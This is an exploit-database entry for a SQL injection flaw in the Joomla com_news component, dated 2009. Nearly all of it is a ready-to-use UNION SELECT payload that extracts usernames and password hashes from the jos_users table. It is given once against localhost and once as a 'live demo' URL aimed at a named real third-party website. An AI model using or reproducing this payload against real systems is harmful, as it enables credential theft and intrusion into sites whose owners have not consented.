Joomla Component com_news SQL Injection Vulnerability

2009-01-19T00:00:00
ID 1337DAY-ID-4705
Type zdt
Reporter Snakespc
Modified 2009-01-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
Joomla Component com_news SQL Injection Vulnerability
=====================================================

                  ===================================================================================                                                                                =
                =                               "com_news"                                           =
                  ===================================================================================

Exploit:
http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
********
Live demo:
http://www.fermaten.dk/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
=============================================================================================================================



#  0day.today [2018-03-19]  #